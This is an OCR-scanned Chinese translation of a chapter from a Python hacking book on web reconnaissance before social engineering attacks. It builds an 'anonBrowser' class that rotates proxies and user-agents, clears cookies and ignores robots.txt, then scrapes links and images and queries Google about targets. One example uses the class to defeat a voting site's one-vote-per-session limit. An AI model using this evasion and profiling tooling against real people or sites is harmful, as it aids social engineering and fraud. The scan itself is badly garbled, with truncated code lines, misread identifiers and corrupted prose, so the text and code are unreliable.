无 人 机 并 建立 了 一 个 工具 识别 无 线 网 络 黑客 工具 。 对 于 蓝牙 协议 ， 我 们 我 们 建立 了 
一 个 工具 来 查找 蓝牙 设备 ， 扫 描 并 渗透 攻击 了 打印 机 和 手机 。 希望 你 喜欢 这 一 章 。 
我 喜欢 编写 这 些 。 下 一 章 ， 我 们 将 讨论 在 开源 的 网 络 社交 媒体 上 使 用 Python 进行 侦 
Bo 


第 六 章 WEB 侦 查 


本 章 内 容 : 


使 用 Mechanize 匿名 浏览 互联 网 
Python 使 用 Beautiful Soup 映射 WEB 元 素 
使 用 Python 与 Google 交 互 

使 用 Python 和 Twitter 交互 

自动 钓鱼 


在 我 生命 的 入 十 七 年 中 ， 我 亲眼 目睹 了 技术 革命 的 演 替 。 但 却 没有 人 完成 了 人 
思考 和 需要 这 一 问题 。 


一 Bernard M. Baruch 美国 第 28 到 第 32 任 总 统 的 顾问 


ore ONS 


简介 : 今天 的 社会 工程 学 


2010 年 ， 两 个 大 规模 的 网 络 攻击 改变 了 我 们 对 网 络 战 的 理解 。 先 前 我 们 在 第 四 章 讨 
dT a eee 国 的 公司 ， 雅 虎 ， 赛 门 铁 克 ， 
Adobe 等 还 有 一 些 Google 账 户 。 华 盛 顿 邮 报 报道 这 是 一 个 新 的 有 着 先进 水 平 的 攻 
击 。Stuxnet， 第 二 次 攻击 ， 针 对 SCADA 系 统 ， 特 别 是 那些 在 伊朗 的 。 网 络 维护 者 
应 该 关注 该 蠕虫 的 发 展 ， 这 是 一 个 比 极光 行动 更 加 先进 和 成 熟 的 蠕虫 攻击 。 尽 管 这 
两 个 网 络 攻 击 非常 复杂 ， 但 他 们 有 一 个 共同 的 关键 点 : 他 们 的 传播 ， 至 少 部 分 是 通 
过 社会 工程 学 传播 的 。 不 管 多 和 勾 复 杂 的 和 致命 的 网 络 攻击 增加 有 效 的 社会 工程 学 会 
增加 攻击 的 有 效 性 。 在 下 面 的 章节 中 ， 我 们 将 研究 如 何 使 用 使 用 Python 来 实现 自动 
化 的 社会 工程 学 攻击 。 


在 进行 任何 操作 之 前 ， 攻 击 者 应 该 有 目标 的 详细 信息 ， 信 息 越 多 攻击 的 成 功 的 机 会 
越 大 。 概 念 延伸 到 信息 战争 的 世界 。 在 这 个 作坊 和 当今 时 代 ， 大 部 分 所 需 的 信息 可 
以 在 互联 网 上 找到 ， 由 于 互联 网 庞大 的 规模 ， 遗 漏 重 要 信息 的 可 能 性 很 高 。 为 了 防 
止 信息 丢失 ， 计 算 机 程序 可 以 自动 完成 整个 过 程 。Python 是 一 个 很 好 的 执行 自动 化 
任务 的 工具 ， 大 量 的 第 三 方 库 多 许 我 们 轻松 的 和 互联 网 ， 网 站 进行 交互 。 


攻击 之 前 的 侦查 


在 本 章 中 ， 我 们 通过 程序 对 目标 进行 侦查 。 在 这 个 发 面 关键 是 确保 我 们 收集 更 多 的 
总 息 量 ， 而 不 被 警惕 性 极 高 ， 外 & 干 的 公司 总 部 的 网 络 管理 员 检 测 到 。 最 后 我 们 将 看 
看 如 何 汇 总 数据 允许 我 们 发 动 高 度 复 杂 的 个 性 化 的 社会 工程 学 攻击 。 确 保 在 应 用 任 
何 这 些 技术 之 前 询问 了 执法 官员 和 法 律 的 意见 。 我 们 在 这 展示 攻击 和 用 过 的 工具 是 
为 了 更 好 的 理解 他 们 的 做 法 和 知道 如 何在 我 们 的 生活 中 如 何 防范 这 种 攻击 。 


使 用 Mechanize 库 浏览 互联 网 


典型 的 计算 机 用 户 依 赖 WEB 浏 览 器 浏览 网 站 和 导航 互联 网 。 每 一 个 站 点 都 是 不 同 
的 ， 可 以 包含 图 片 ， 音 乐 和 视频 中 的 各 种 各 样 的 组 合 。 然 而 ， 浏 览 器 实际 上 读 取 一 
个 文本 类 型 的 文档 ， 理 解 它 ， 然 后 将 他 显示 给 用 户 ， So 
件 和 Python 解释 器 的 互动 。 用 户 可 以 使 用 浏览 器 访问 站 点 或 者 使 用 不 同 的 方法 浏 
他 们 的 源 代 码 。 *Linux 下 的 我 wget 程序 是 个 很 受 欢 迎 的 方法 。 在 Python 中 ， 浏 
互联 网 的 唯一 途径 是 取 回 并 下 载 一 个 网 站 的 HTML 源 代码 。 有 许多 不 同 的 库 已 经 
经 完 PTAA E 容 的 任务 。 我 们 特别 喜欢 Mechanize ， 你 在 前 几 章 已 经 用 
过 。 Mechanize : http://wwwsearch.sourceforge.net/mechanize/ ° 

Mechanize 主要 的 类 Browser > 以 在 浏览 器 是 上 进行 的 操作 。 这 个 类 
也 有 其 他 的 有 用 的 方法 是 程序 变 得 更 简单 。 下 面 脚本 演示 了 Mechanize cea 
使 用 : 取 回 一 个 站 点 的 源 代 码 。 这 需要 创 | 建 一 个 浏览 器 对 象 ， 然 后 调用 open() $ 
数 。 


import mechanize 


def viewPage(url): 
browser = mechanize.Browser( ) 
page = browser.open(ur1) 
source_code = page.read() 
print(source_code) 
viewPage('http://www.syngress.com/' ) 


运行 这 个 脚本 ， 我 们 看 到 它 打 印 出 www.syngress.com 首页 的 HTML 人 代码。 


recon:~# python viewPage. py 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtmL"> 
<head> 

<title> 

Syngress.com - Syngress is a premier publisher of content in 
the Information Security field. We cover Digital Forensics, Hackinc¢ 
and Penetration Testing, Certification, IT Security and Administrat 
more. 

</title> 

<meta name="description" content="" /><meta name="keywords" 
content="" /> 
<,..SNIPPED. T > 





我 们 将 使 用 mechanize.Browser 类 来 构建 脚本 ， 在 本 章 中 浏览 互联 网 。 但 是 你 不 

会 受 它 的 约束 ， Python 提供 了 几 个 不 同 的 方法 浏览 。 这 章 使 用 Mechanize ate 
提供 了 特殊 的 功能 。John J. Lee 设 计 的 Mechanize 提供 可 状态 编程 ， 简 单 的 
HTML 表 格 和 方便 的 解析 和 处 理 ， 例 如 HTTP-Equiv 这 样 的 命令 和 刷新 。 此 外 ， 它 
提供 给 你 的 内 在 对 象 是 匿名 的 。 这 一 切 都 会 在 下 面 的 章节 中 用 到 。 


匿名 --- 增 加 代理 ， 用 户 代 理 和 Cookies 


现在 我 们 有 从 互联 网 获取 网 页 内 容 的 能 力 ， 退 一 步 想 想 接 下 来 的 处 理 很 有 必要 。 我 
们 的 程序 和 在 浏览 器 中 打开 一 个 网 站 没有 什么 不 同 ， 因 此 ， 我 们 应 该 采取 同样 的 步 
又 在 正常 的 浏览 网 页 时 建立 匿名 。 网 站 查找 唯一 标识 符 来 识别 网 页 游客 有 几 种 不 同 
的 方法 。 第 一 Pata pn een A de 
络 (VPN) 或 者 tor 网 络 来 缓和 。 一 旦 一 个 客户 连接 到 VPN， 然 后 ， 所 有 的 将 通过 VPN 
自动 处 理 。Python 可 以 连接 到 代理 服务 器 ， 给 程序 添加 匿名 功能 。 Mechanize 的 
Browser 类 可 以 指定 一 个 代理 服务 器 属性 。 简 单 的 设置 浏览 器 代理 是 不 够 巧妙 的 。 
有 很 多 的 免费 的 代理 网 络 ， 所 以 用 户 可 以 进去 选择 它们 ， 通 过 它们 的 功能 浏览 。 在 
这 个 例子 中 ， 我 们 选择 http://www.hidemyass.com/ 的 HTTP 代 理 。 在 你 读 到 这 里 的 
时 候 这 个 代理 很 有 可 能 已 经 不 工作 了 。 所 以 去 这 个 网 站 得 到 使 用 不 同 HTTP 代 理 的 
细节 。 此 外 ，McCurdy 维 护 了 一 个 很 好 的 代理 列表 在 网 站 
http://rmccurdy.com/scripts/proxy/good.txt 。 我 们 将 测试 我 们 的 代理 访问 NOAA 网 
站 ， 它 会 友好 的 告诉 你 访问 该 网 站 时 你 的 |P 地 址 。 


import mechanize 


def testProxy(url, proxy): 
browser = mechanize.Browser( ) 
browser .set_proxies(proxy) 
page = browser.open(ur1) 
source_code = page.read() 
print source_code 


url = 'http://ip.nefsc.noaa.gov/' 
hideMeProxy = {'http': '216.155.139.115:3128'} 
testProxy(url, hideMeProxy) 


虽然 识别 HTML 源 代码 有 一 点 困难 ， 我 们 看 到 该 网 站 人 为 我 们 的 IP 地 址 
是 216.155.139.115 ， 我 们 的 代理 ， 成 功 1 我 们 继续 构建 脚本 。 


recon:~# python proxyTest.py 
<html><head><title>what's My IP Address?</title></head> 
<..SNIPPED. .> 
<b>Your IP address is...</b></font><br><font size=+2 face=arial 
color=red> 216.155.139.115</font><br><br><br><center> <font s: 
font><br><font size=+2 face=arial color=red> 216.155.139.115. 
choopa.net</font></font><font color=white 
<,..SNIPPED. .> 


e A O 话 





我 们 现在 有 一 个 简单 的 匿名 浏览 器 。 站 点 使 用 浏览 器 的 user-agent 字符 串 来 识 
别 唯 一 用 户 另 一 种 方法 。 在 正常 情况 下 ， user-agent | 
览 器 的 重要 信息 能 制作 HTML 代 码 给 用 户 更 好 的 体验 。 然 而 ， 这 些 信 息 柏 包含 内 核 

版 本 ， 浏览 览 器 版 本 ， 和 其 他 关于 用 户 的 详细 信息 。 恶 意 网 站 利用 这 些 信息 针对 特定 


的 浏览 器 进行 精密 的 渗透 利用 ， 而 其 他 网 站 利用 这 些 信息 来 区 分 电脑 是 位 与 NAT 网 
络 还 是 私有 网络。 最 近 ， 一 个 刁 闻 被 爆 出 ， 一 个 旅游 网 站 利用 user-agent 字符 
串 来 检测 MacBook 用 户 并 提供 更 昂贵 的 选择 。 


幸运 的 是 ， Mechanize 改变 user-agent 字符 串 和 改变 代理 一 样 简单 。 网 站 : 
http://www.useragentstring.com/pages/useragentstring.php 为 我 们 展示 了 一 个 巨大 
的 有 效 的 user-agent 字符 串 名 单 供 我 们 选择 。 我 们 将 编写 一 个 脚本 来 测试 改变 
我 们 的 user-agent 字符 串 访 问 http://whatismyuseragent.dotdoh.com/ 来 打印 出 
我 们 的 user-agent 字符 。 


import mechanize 


def testUserAgent(url, userAgent): 
browser = mechanize.Browser( ) 
browser.addheaders = userAgent 
page = browser.open(ur1) 
source_code = page.read() 
print(source_code) 


url = 'http://whatismyuseragent.dotdoh.com/' 


userAgent = [('User-agent', 'Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586 
testUserAgent(url, userAgent ) 


| _ 3 


运行 这 个 脚本 ， 我 们 看 到 我 们 可 以 用 虚假 的 user-agent 字符 串 来 访问 页 面 。 





recon:~# python userAgentTest. py 

<html> 

<head> 
<title>Browser UserAgent Test</title> 
<style type="text/css"> 

<..SNIPPED. ,> 
<p><a href="http://www.dotdoh.com" target="_blank"><img src="1¢ 
gif" alt="Logo" width="646" height="111" border="0"></a></p> 
<p><h4>Your browser's UserAgent string is: <span 
class="style1"><em>Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en- 
m18) Gecko/20010131 Netscape6/6.01</em></span></h4> 
</p> 

<..SNIPPED. .> 


Ju 


最 后 ， 网 站 会 返回 一 些 包 含 独特 标识 的 cookie 给 WEB 浏 览 器 允许 网 站 识别 重复 的 重 
复 的 访客 。 为 了 防止 这 一 点 ， 我 们 将 执行 其 他 函数 从 我 们 的 WEB 浏 览 器 中 清除 
Cookie。 另 外 一 个 Python 标准 库 cookielib 包含 几 个 处 理 不 同类 型 cookie 的 容 

器 。 这 里 使 用 的 cookie 类 型 包含 储存 各 种 不 同 的 cookie 到 硬盘 的 功能 。 这 个 功能 
许 用 户 查 看 cookies 而 不 必 在 初始 化 后 返回 给 网 站 。 让 我 们 建立 一 个 简单 的 脚本 使 
用 CookieJar 来 测试 。 我 们 将 打开 http://www.syngress.com 页 面 作 为 我 们 的 第 
一 个 例子 。 但 现在 我 们 打印 浏览 会 话 存储 的 cookie。 





import mechanize 
import cookielib 


def printCookies(url): 
browser = mechanize.Browser( ) 
cookie_jar = cookielib.LWPCookieJar() 
browser .set_cookiejar(cookie_jar) 
page = browser.open(ur1) 
for cookie in cookie jar: 
print (cookie) 


url = 'http://www.syngress.com/' 
printCookies(url) 


运行 这 个 脚本 ， 我 们 可 以 看 到 来 自 网 站 的 session id“ cookie ° 


recon:~# python printCookies.py 
<Cookie _syngress_session=BAh7CTONY3VydmVudHkiCHVZZDoJbGFzdCIA0g9Zzz 


和 封装 我 们 的 代码 为 Python 类 


已 经 有 了 几 个 功能 ， 将 浏览 器 作为 参数 ， 修 改 它 ， 偶 尔 添加 一 个 额外 的 参数 。 如 果 
将 这 些 添加 到 一 个 类 里 面 将 很 有 用 ， 这 些 功能 可 以 归结 为 一 个 浏览 器 对 象 简 单 的 调 
用 ， 而 不 是 导入 我 们 的 也 数 到 某 个 文件 使 用 策 拙 的 语法 调用 。 我 们 我 们 这 么 做 可 以 
扩展 Browser 类 ， 我 们 的 新 ee 类 将 会 有 我 们 已 经 创建 过 的 函数 ， 以 及 初 
始 化 的 附加 功能 。 这 将 有 利于 提高 代码 的 可 读 性 ， 并 封装 所 有 的 功能 

在 Browser 类 中 直接 处 理 。 





import mechanize, cookielib, random, time 


class anonBrowser(mechanize.Browser ): 
def _ init__(self, proxies = [], user_agents = []): 
mechanize.Browser. init__(self) 
self.set_handle_robots(False) 
self.proxies = proxies 
self.user_agents = user_agents + ['Mozilla/4.0 ', 'FireFox, 
self.cookie_jar = cookielib.LWPCookieJar( ) 
self.set_cookiejar(self.cookie_jar) 
self .anonymize() 
def clear_cookies(self): 
self.cookie_jar = cookielib.LWPCookieJar( ) 
self.set_cookiejar(self.cookie_jar) 
def change_user_agent(self): 
index = random.randrange(0, len(self.user_agents) ) 
self.addheaders = [('User-agent', (self.user_agents[index|] ' 
def change_proxy(self): 
if self.proxies: 
index = random.randrange(0, len(self.proxies) ) 
self.set_proxies({'http': self.proxies[index]}) 
def anonymize(self, sleep = False): 
self .clear_cookies() 
self .change_user_agent() 
self .change_proxy() 
if sleep: 
time.sleep(60) 


E = = 


我 们 的 新 类 有 一 个 默认 的 user-agents 列表 ， 接 受 列 表 添 加 进去 ， 以 及 用 户 想 使 
用 的 代理 服务 器 列表 。 它 还 具有 我 们 先前 创建 的 三 个 功能 ， 可 以 单独 也 可 以 同时 使 
用 匿名 函数 。 最 后 ， anonymize 提供 等 待 60 秒 的 选项 ， 增 加 在 服务 器 日 志 请 求 访 
问 之 间 的 时 间 。 同 时 也 不 改变 提供 的 信息 ， 该 额外 的 步骤 减 小 了 被 识别 为 相同 的 源 
地 址 的 机 会 。 增 加 时 间 和 模糊 的 通过 安全 是 一 个 道理 ， 但 是 额外 的 措施 是 有 帮助 
的 ， 时 间 通 常 不 是 一 个 问题 。 另 一 个 程序 可 以 以 相同 的 方式 使 用 这 个 新 类 。 文 

件 anonBrowser.py 包含 新 类 ， 如 果 想 在 导入 调用 是 看 到 它 ， 我 们 必须 将 它 保 存 
在 脚本 的 目录 。 让 我 们 编写 我 们 的 脚本 ， 导 入 我 们 的 新 类 。 我 有 一 个 教授 曾 将 帮助 
他 四 岁 的 女儿 在 线 投票 竞争 小 猫 冠军 。 由 于 投票 是 在 会 话 的 基础 上 的 ， 每 个 游客 的 
票 需要 是 唯一 的 。 我 们 来 看 看 是 否 我 们 能 坎 骗 这 个 网 站 给 予 我 们 每 次 访问 唯一 的 
cookie。 我 们 将 匿名 访问 该 网 站 四 次 。 





from anonBrowser import * 
ab = anonBrowser(proxies=[],user_agents=[('User-agent', 'superSecret 
for attempt in range(1, 5): 

ab. anonymize( ) 

print('[*] Fetching page') 

response = ab.open('http://kittenwar.com' ) 

for cookie in ab.cookie jar: 

print (cookie) 
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运行 该 脚本 ， 我 们 看 到 页 面 获得 五 次 不 同时 间 不 同 cookie 的 访问 。 成 功 l 随 着 我 们 
匿名 访问 类 的 建立 ， 让 我 们 抹 去 我 们 访问 网 站 上 的 私人 信息 。 





recon:~# python kittenTest.py 

[*] Fetching page 

<Cookie PHPSESSID=qg3fbiaOt7ue3dnen5i8brem61 for kittenwar.com/> 
[*] Fetching page 

<Cookie PHPSESSID=25s8apnvejkakdjtd67ctonfloO for kittenwar.com/> 
[*] Fetching page 

<Cookie PHPSESSID=16srf8kscgb212e2fknoqf4nh2 for kittenwar.com/> 
[*] Fetching page 

<Cookie PHPSESSID=73uhg6glqge9p2vpkOgt3d4ju3 for kittenwar.com/> 


用 匿名 类 抹 去 WEB 页 面 


现在 我 们 可 以 用 Python 取 回 WEB 内 容 。 可 以 开始 侦查 目标 了 。 我 们 可 以 通过 检索 大 
型 的 网 站 来 开始 我 们 的 研究 了 。 攻 击 者 可 以 深入 的 调查 目标 的 主页 面 寻 找 隐 藏 的 和 

有 价值 的 数据 。 然 而 这 种 搜索 行动 会 产生 大 量 的 页 面 浏 览 器 。 移 动 网 站 的 内 容 到 本 
地 能 减少 页 面 的 浏览 数 。 我 们 可 以 只 访问 页 面 一 次 ， 然 后 研究 无 数 次 。 有 一 些 框架 
可 以 这 样 做 ， 但 是 我 们 将 建立 我 们 自己 的 ， 利 用 先前 的 anonBrowser 类 。 让 我 们 

利用 anonBrowser 类 检索 目标 网 站 所 有 的 链接 吧 。 


用 Beautiful Soup 解 析 Href 链 接 


为 了 从 目标 网 站 解析 链接 ， 我 们 有 两 个 选择 : (1) 利 用 正则 表达 式 来 搜索 和 替换 
HTML 代 码 。(2) 使 用 强大 的 第 三 方 库 BeautifulSoup ， 可 以 在 下 面 网 站 下 载 安 
装 : http://www.crummy.com/software/BeautifulSoup/ ° BeautifulSoup 的 创造 
者 构建 了 这 个 极 好 的 库 来 处 理 和 解析 HTML 代 码 和 XML 。 首 先 ， 我 们 看 看 怎样 使 用 
两 种 方法 找到 链接 ， 然 后 解释 为 什么 大 多 数 情 况 下 BeautifulSoup 是 很 好 的 选 


择 。 


# coding=UTF-8 


from anonBrowser import * 

from BeautifulSoup import BeautifulSoup 
import optparse 

import re 


def printLinks(url): 
ab = anonBrowser() 
ab. anonymize() 
page = ab.open(url) 
html = page.read() 


try: 
print '[+] Printing Links From Regex. ' 
link_finder = re.compile('href="(.*?)"') 
links = link_finder.findall(htm1) 
for link in links: 
print link 
except: 
pass 
try: 
print '\n[+] Printing Links From BeautifulSoup. ' 
soup = BeautifulSoup(htm1) 
links = soup.findAll(name='a' ) 
for link in links: 
if link.has_key('href'): 
print link['href'] 
except: 
pass 
def main(): 


parser = optparse.OptionParser('usage%prog -u <target url>') 
parser.add_option('-u', dest='tgtURL', type='string', help='spe 
(options, args) = parser.parse_args() 
url = options.tgtURL 
if url == None: 

print parser.usage 

exit(0) 
else: 

printLinks(url) 


if name == '_main_': 


main() 
Eee 


行 我 们 的 脚本 ， 让 我 们 来 解析 来 自流 行 网 站 的 链接 ， 我 们 的 脚本 产生 链接 的 结果 
过 正则 表达 式 和 BeautifulSoup 解析 。 





运 
通 


recon:# python linkParser.py -uhttp://www.hampsterdance.com/ 
[+] Printing Links From Regex. 

styles.css 

http://Kunaki.com/Sales.asp?PID=PX0Q@ZBMUHD 
http://Kunaki.com/Sales.asp?PID=PX0QZBMUHD 
Freshhampstertracks.htm 

freshhampstertracks.htm 

freshhampstertracks.htm 

http://twitter.com/hampsterrific 
http://twitter.com/hampsterrific 
https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 
funnfree.htm 
https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 
https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 
meetngreet.htm 

http://www.asburyarts.com 

index.htm 

meetngreet.htm 

musicmerch.htm 

funnfree.htm 

freshhampstertracks.htm 

hampsterclassics.htm 

http://www.statcounter.com/joomla/ 

[+] Printing Links From BeautifulSoup. 
http://Kunaki.com/Sales.asp?PID=PX00ZBMUHD 
http://Kunaki.com/Sales.asp?PID=PX00ZBMUHD 
freshhampstertracks.htm 

freshhampstertracks.htm 

freshhampstertracks.htm 

http://twitter.com/hampsterrific 
http://twitter.com/hampsterrific 
https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 
funnfree.htm 
https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 
https://app.expressemailmarketing.com/Survey.aspx?SFID=32244 
meetngreet.htm 

http://www.asburyarts.com 

http://www.statcounter.com/joomla/ 


年 一 看 两 个 似乎 差不多 。 然 而 ， 使 用 正则 表达 式 和 BeautifulSoup 产生 了 不 同 的 
结果 ， 与 一 个 特定 的 数据 块 相关 联 的 标签 变化 不 大 ， 造 成 程序 更 加 顽固 的 是 网 站 管 
理 员 的 念头 。 比 如 ， 我 们 的 正则 表达 式 包 含 CSS 作 为 一 个 link ， 显 然 ， 这 不 是 一 
个 链接 ， 但 他 被 正则 表达 式 匹 配 了 。 BeautifulSoup 解析 时 知道 忽略 它 ， 不 包 


Ay o 


| Beautiful Soup T R 4 4 


除了 网 页 上 面 的 链接 ， 它 上 面 的 图 片 可 能 会 有 用 。 在 第 三 章 ， 我 们 展示 了 如 何 从 图 
a. 再 一 次 ， BeautifulSoup 成 为 了 关键 ， 允 许 在 任何 HTML 中 搜 
索 img 标签 。 浏 览 器 对 象 下 载 图 片 保 存在 本 地 硬盘 ， 代 码 的 变化 只 是 将 链接 变 为 
图 像 。 随 着 这 些 变化 ， 我 们 基本 的 检索 器 已 经 变 得 足够 强大 到 找到 网 页 的 链接 和 下 
载 图 像 。 


# coding=UTF-8 

from anonBrowser import * 

from BeautifulSoup import BeautifulSoup 
import os 

import optparse 


def mirrorImages(url, dir): 

ab = anonBrowser() 

ab. anonymize( ) 

html = ab.open(url) 

soup = BeautifulSoup(htm1) 

image_tags = soup.findAll('img') 

for image in image_tags: 
filename = image['src'].lstrip('http://') 
filename = os.path.join(dir, filename.replace('/', '_')) 
print('[+] Saving ' + str(filename) ) 
data = ab.open(image['src']).read() 
ab. back() 
save = open(filename, 'wb') 
save.write(data) 
save.close() 


def main(): 
parser = optparse.OptionParser('usage%prog -u <target url> -d < 
parser.add_option('-u', dest='tgtURL', type='string', help='spe 
parser.add_option('-d', dest='dir', type='string', help='specili 
(options, args) = parser.parse_args() 
url = options. tgtURL 
dir = eg ay ae 


if url == None or dir == None: 
yea parser .usage 
exit (0) 

else: 
try: 


mirrorImages(url, dir) 

except Exception, e: 
print('[-] Error Mirroring Images. ') 
print('[-] * + str(e)) 


if name == ' _main_': 








econ:~# python imageMirror.py -u http://xkcd.com -d /tmp/ 
[+] Saving /tmp/imgs.xkcd.com_static_terrible_small_logo.png 
[+] Saving /tmp/imgs.xkcd.com_comics_moon_landing.png 

[+] Saving /tmp/imgs.xkcd.com_s_a899e84. jpg 


研究 ， 调 查 ， 发 现 


在 大 多 数 现代 社会 工程 学 的 尝试 中 ， 攻 击 者 的 目标 从 公司 或 者 企业 开始 。 对 于 
Stuxnet 的 营 事 者 ， 是 一 个 有 权限 进入 SCADA 系 统 的 伊朗 人 。 极 光 行 动 背 后 的 人 是 
通过 调查 公司 的 人 员 而 获取 对 重要 地 点 的 访问 权 的 。 让 我 们 假设 ， 我 们 有 一 个 有 趣 
的 公司 并 知道 背后 一 个 主要 人 物 ， 一 个 通常 的 攻击 者 可 能 会 有 比 这 个 更 少 的 信息 。 
攻击 者 往往 只 有 攻击 者 更 宏观 的 知识 ， 他 们 需要 利用 互联 网 和 其 他 资源 深入 了 解 个 
人 。 从 Oracle，Google 等 所 有 的 ， 我 们 利用 接 下 来 的 一 系列 的 脚本 。 


用 Python 和 Google API 交 互 


想象 一 下 ， 一 个 朋友 问 你 一 个 隐 几 的 问题 ， 他 们 错误 的 的 o 你 怎么 
回答 ? Google 一下。 所以， 我 们 如 何 了 解 目标 公司 的 更 多 信息 了 ? 好 的 ， 答 案 再 次 
7 Google 提 供 了 应 用 程序 接口 API 多 许 程序 员 进行 查 查询 并 得 到 结果 ， 而 不 

尝试 破解 正常 的 Google 界 面 。 目 前 有 两 套 API， 老 昌 的 API 和 API， 这 些 需要 开发 
o 妥 求 独一无二 的 开发 者 密 铀 让 匿名 变 得 不 可 能 ， 一 些 我 们 以 努力 获得 成 功 
的 脚本 将 不 能 用 。 oe 天 之 中 进行 一 系列 的 查询 ， 大 约 
每 天 30 次 搜索 结果 。 用 于 收集 信 ， 息 的 话 30 次 结果 足够 了 解 一 个 组 织 网 站 的 信息 了 。 
我 们 将 建立 我 们 的 查询 功能 ， 返回 攻击 肖 感 兴趣 的 信息 ° 


import urllib 
from anonBrowser import * 


def google(search_term): 
ab = anonBrowser( ) 
search_term = urllib.quote_plus(search_term) 
response = ab.open('http://ajax.googleapis.com/ajax/services/s¢ 
print(response.read() ) 
google('Boondock Saint') 


从 Google 返 回 的 内 容 和 下 面 的 类 似 。 





{"responseData": {"results":[{"GsearchResultClass":"GwebSearch", 
"unescapedur1l":"http://www.boondocksaints.com/","url":"http:// 
www. boondocksaints.com/", "visibleUr1l":"www.boondocksaints. 

com", "cacheUrl": "http://www. google.com/search?q\ 

u0O3dcache: J3XwWOwgXgn4J:www.boondocksaints.com","title":"The \ 
U003cbxu003eBoondock Saints\u003c/b\u003e", "titleNoFormatting": "The 
Boondock 

<,..SNIPPED. ,> 

\u0O3cb\u003e.. .\u003c/b\u003e"}], "Cursor": {"resultCount":"62, 800", 
"pages": [{"start": "0", "label":1}, {"start":"4","label":2}, {"start 
vere" “label :3h, 4"start'’s"12","label”:4}), startu "26", “label”: 
5}, {"start":"20","label":6},{"start":"24","label":7},{"start":"2 
8", "label":8}], "estimatedResultCount": "62800", "currentPageIndex" 
:0, "moreResultsUr1": "http://www. google.com/search?oe\u003dutf8\ 
u0026ie\u003dutf8\u0026source\u003duds\u0026start\u003d0\u0026h1\ 
u003den\u0026q\u003dBoondock+Saint", "searchResultTime":"0.16"}}, 
"responseDetails": null, "responseStatus": 200} 


二 | 


quote_plus() 函数 是 这 个 脚本 中 的 新 的 代码 块 。URL 编 码 是 指 非 字母 数字 的 字 
符 被 转换 然后 发 送 到 服务 器 。 虽 然 不 是 完美 的 URL 编 码 ， 但 是 适合 我 们 的 目的 。 最 
后 打印 Google 的 响应 显示 : 一 个 长 字符 串 的 括号 和 引号 。 如 果 你 仔细 观察 ， 会 发 现 
响应 的 内 容 看 起 来 很 像 字 典 。 这 些 响应 是 json 格 式 的 ， 和 字典 非常 相似 ， 不 出 所 
料 ，Python 有 库 可 以 构建 和 处 理 json 字 符 串 。 让 我 们 添加 这 个 功能 重新 审视 这 个 响 
应 © 


import urllib, json 
from anonBrowser import * 


def google(search_term): 
ab = anonBrowser( ) 
search_term = urllib.quote_plus(search_term) 
response = ab.open('http://ajax.googleapis.com/ajax/services/s¢ 
objects = json.load(response 
print(response.read() ) 
google('Boondock Saint') 


了 — # 


当 我 们 打印 对 象 时 ， 看 起 来 非常 像 第 一 次 函数 的 响应 。json 库 加 载 响应 到 一 个 字 
典 ， 让 这 些 字段 更 容易 理解 ， 而 不 需要 手动 的 解析 字符 串 。 





{u'responseData': {u'cursor': {u'moreResultsUrl': u'http://www. goo, 
com/search?oe=ut f8&amp ; ie=ut F8&amp ; source=uds&amp; star t=O0&amp ; hl=er 
+Saint', u'estimatedResultCount': u'62800', u'searchResultTime': 
u'@.16', u'resultCount': u'62,800', u'pages': [{u'start': u'0', 
u'label': 1}, {u'start': u'4', u'label': 2}, {u'start': u'8', 
u'label': 3}, f{u'start': u'12', u'label': 4}, {u'start': u'16', 
u'label': 5}, {u" start’: u'20', Ww label": 6}, {u'start': u'24', 
u'label': 7}, {u'start': u'28', u..SNIPPED..> 

Saints</b> - Wikipedia, the free encyclopedia', u'url': u'http:// 
en.wikipedia.org/wiki/The_Boondock_Saints', u'cacheUrl': u'http:// 
www. google.com/search?q=cache: BKaGPxznRLYJ:en.wikipedia.org', 
u'unescapedUrl': u'http://en.wikipedia.org/wiki/The_Boondock_ 
Saints', u'content': u'The <b>Boondock Saints</b> is a 1999 Americi 
action film written and directed by Troy Duffy. The film stars Sear 
Patrick Flanery and Norman Reedus as Irish fraternal <b>...</b>'}]- 
u'responseDetails': None, u'responseStatus': 200} 


Hie S SSS ee 





现在 我 们 可 以 考虑 在 一 个 给 定 的 Google 搜 索 的 结果 里 什么 事 是 重要 的 。 显 然 ， 页 面 
返回 的 链接 很 重要 。 此 外 ， 页 面 的 标题 和 Google 用 的 小 的 文本 断 对 理解 链接 指向 哪 
里 也 很 重要 。 为 了 组 织 这 些 结果 ， 我 们 创建 了 一 个 类 来 保存 结果 。 这 将 是 访问 不 同 
的 信息 更 容易 。 


# coding=UTF-8 

import json 

import urllib 

import optparse 

from anonBrowser import * 


class Google Result: 
def _ init__(self, title, text,url): 
self.title = title 
self.text = text 
self.url = url 
def _ repr_ (self): 
return self.title 


def google(search_term): 
ab = anonBrowser( ) 
search_term = urllib.quote_plus(search_term) 
response = ab.open('http://ajax.googleapis.com/ajax/services/s¢ 
objects = json.load(response) 
results = [] 
for result in objects['responseData']['results']: 
url = result['url'] 
title = result['titleNoFormatting' | 
text = result['content'] 
new_gr = Google Result(title, text, url) 
results.append(new_gr) 
return result 


def main(): 
parser = optparse.OptionParser('usage%prog -k <keywords>' ) 
parser.add_option('-k', dest='keyword', type='string', help='sy 
(options, args) = parser.parse_args() 
keyword = options.keyword 


if options.keyword == None: 
print(parser.usage) 
exit(0) 

else: 
results = google( keyword) 
print(results) 

if _ name == '_ main_': 
main() 


了 = z 
这 种 更 简洁 的 呈现 数据 的 方式 产生 以 下 输出 : 





recon:~# python anonGoogle.py -k 'Boondock Saint' 

[The Boondock Saints, The Boondock Saints (1999) - IMDb, The Boondc 
Saints II: All Saints Day (2009) - IMDb, The Boondock Saints - 

Wikipedia, the free encyclopedia | 


图 








M Python #47 Tweets 


在 这 一 点 上 ， 我 们 的 脚本 已 经 自动 的 收集 了 一 些 我 们 的 目标 的 信息 。 在 我 们 的 下 一 
系列 的 步骤 中 ， 我 们 将 撤离 域 和 组 织 ， 开 始 在 网 上 寻找 可 用 的 个 人 信息 。 


